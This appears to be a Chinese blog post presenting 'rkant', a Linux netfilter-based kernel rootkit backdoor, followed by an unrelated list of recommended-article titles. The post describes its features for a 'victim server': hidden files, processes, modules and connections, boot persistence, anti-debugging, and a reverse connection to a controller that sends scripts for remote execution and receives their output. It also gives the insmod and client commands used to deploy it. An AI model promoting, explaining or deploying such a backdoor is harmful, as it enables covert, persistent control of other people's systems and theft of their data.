rkant = rootkit ant,它是利用netfilter hook开发的一款linux后门rootkit程序。

rkant包括服务器端程序(on victim server)和客户端程序(on user client pc),在ubuntu上面测试通过。
功能:
1、任意端口复用。端口复用,它就是在系统已经开放的端口上进行通讯,并且不影响系统的正常工作和服务的正常运行。
2、隐藏文件以及目录,用linux工具无法查看到。防删除。
3、隐藏模块,开机启动,防发现。
4、反向连接。服务器定时连接指定的ip/port。
5、隐藏网络连接/端口,反调试,防止被跟踪和破解。内容加密传送。

rkant.ko设计要点:
1、安装时,会隐藏式启动一个后门进程(antclient)。
2、在内核空间中尝试向指定的pc机(模块参数指定mac_addr/ip/port)发送探测消息,直到收到回应为止。
3、pc机(antkeeper)给server回送hello消息时,可传送需要执行的脚本比如sh /home/freeman/myspy.sh,这样达到远程执行命令的目的。
4、在收到pc机给出的hello消息后,rootdoor回送hello_ack消息。在hello_ack消息中可送出任何想送出的信息,比如myspy.sh的执行结果或是其它信息。

安装说明:
1.将rkant.ko/antclient放到server的home/freeman目录下面。
2.将antkeeper放到客户机上面,任何一个目录均可。

在server中,如果用的是eth1,那么,安装参数是:
insmod rootdoor.ko dnet=eth1 dmac=00:0c:29:40:99:20 dip=192.168.2.8    //damc/dip是目标机(client pc)的mac和ip,它是虚拟机2

antkeeper运行方法:
./antkeeper 192.168.2.8 192.168.2.113    //第一个ip是本机的ip,第二个ip是server的ip。
如果拿不到server的ip,也就是说server只有内网IP,无公网IP。那第二个ip就不填,留空。

rootkit后门程序开发测试过程相关推荐

  1. 防止开发人员开发后门程序,数据库安全之应用程序调用的危险

    数据库安全本身是一个比较大的概念,其中包括数据独立性.数据安全性.数据完整性.并发控制和故障恢复等.这里我想讨论一下数据的安全性和应用程序对数据库调用的安全验证. 对于数据安全性, 一般采取隔离法则, ...

  2. DevOps 在移动应用程序开发中扮演什么角色?

    作者 | VARUN BHAGAT 译者 | 火火酱,责编| Carol 封图 | CSDN 付费下载自视觉中国 全球智能手机用户数量已经超过30亿.据估计,未来几年用户人数将增加至数亿人.智能手机用 ...

  3. 恶意PPT文件夹带漏洞攻击和后门程序

    趋势科技发现有一个恶意PowerPoint 文件,会以邮件附件的形式攻击用户.这个文件内嵌一个Flash 内容,会利用特定版本Flash Player 的漏洞(CVE-2011-0611)将后门程序植 ...

  4. android devik进程,suckit后门程序的分析 (二)

    这篇文章为我早期的时候发表的文章,为什么我要写这个呢?因为这个程序写得太精妙了,我不得不佩服他的隐藏性,非常先进.看看我写的就知道他的精妙之处了! 关于这场攻击与反攻击的文章我随后几天撰写.精彩不容错 ...

  5. 艾玛迪斯咨询讨论Android应用程序开发的QA测试和碎片

    艾玛迪斯咨询讨论Android应用程序开发的QA测试和碎片 的一大挑战,开发Android?应用程序是目前市场上Android设备的数量.事实上,随着近100独特的Andr​​oid设备提供有质量保证 ...

  6. 权限维持——获取登陆账号及安装后门程序

    当攻击者获取服务器权限后,通常会采用一些后门技术来维持自己当前得到的权限,服务器一旦被植入后门,那么攻击者下次进入就方便多了. 由于攻击可能被发现,会清除一些shell,导致目标丢失,所以需要留下后门 ...

  7. 磊科(NetCore)全系列路由器中的“疑似后门”程序

    看近年来的路由器后门,多数是内置了超级密码,可直接登录路由管理后台,或是后台开启了FTP,可以任意文件上传下载等,再有就是存在一些很明显的"漏洞",这些勉强也说得过去.但如果直接监 ...

  8. 微信小程序开发推进表_推进软件测试程序的最佳实践

    微信小程序开发推进表 Software testing process is used to assess evaluate a product to see if it really meets t ...

  9. 微信小程序开发指南介绍

    一.小程序介绍与开发环境: 1.helloworld代码 [1]请前往https://mp.weixin.qq.com/debug/wxadoc/dev/devtools/download.html  ...

  10. rootkit后门检测工具

    1. 关于rootkit rootkit是Linux平台下最常见的一种木马后门工具,它主要通过替换系统文件来达到入侵和和隐蔽的目的,这种木马比普通木马后门更加危险和隐蔽,普通的检测工具和检查手段很难发 ...

最新文章

  1. 用spss做多组两两相关性分析_两独立样本T检验及如何利用SPSS实现其操作
  2. redisson的锁的类型_利用Redisson实现分布式锁,并防止重复提交
  3. scatter() 散点图样式
  4. .依存句法分析--提取用户评论
  5. 自定义控件之瀑布流与水波纹实现
  6. iOS-项目常见文件
  7. SpringBoot2 | Spring IOC 流程中核心扩展接口的12个扩展点源码分析(十一)
  8. java中构造函数有什么用,java中的构造函数有什么用?用它有什么好处?在什么地方用?...
  9. CF10D LCIS
  10. 关于PostgreSQL空间膨胀的研究
  11. 解决在IDEA 的Maven下 出现 Cannot access in offline mode 问题
  12. java foreach参数_java – Mybatis foreach迭代复杂对象参数中的整数列表
  13. perl的bareword
  14. CGLIB实现AOP,MethodInterceptor接口和Enhancer详解——Spring AOP(四)
  15. 求立方根函数cbrt
  16. hashmap!hashmap
  17. 迅为-iMX6ULL开发板上配置AP热点
  18. 2-SII--应用本包下文件写入和读取
  19. 【实例分割|Mask2Former】 解决模型推理预测的代码中存在的一些问题
  20. PPT中如何插入SWF视频文件(百分之百有效的方法)

热门文章

  1. 关于xlrd不支持xlsx格式的解决办法
  2. _f5是c语言合法变量,C语言练习题1
  3. python 发送短信验证码
  4. 《计算机网络 自顶向下方法》读书笔记(三)
  5. TPP是也只是一种挑战
  6. ggggxc学习笔记---C语言代码I
  7. 如何进行支付流程及安全测试?
  8. 出家12年,北大数学天才柳智宇下山还俗:从事心理咨询,主动要求降薪至2万
  9. 麦吉尔 计算机科学学分,麦大毕业要求深度解析,还你一个真实的麦吉尔大学!...
  10. uniapp-路由和navigate跳转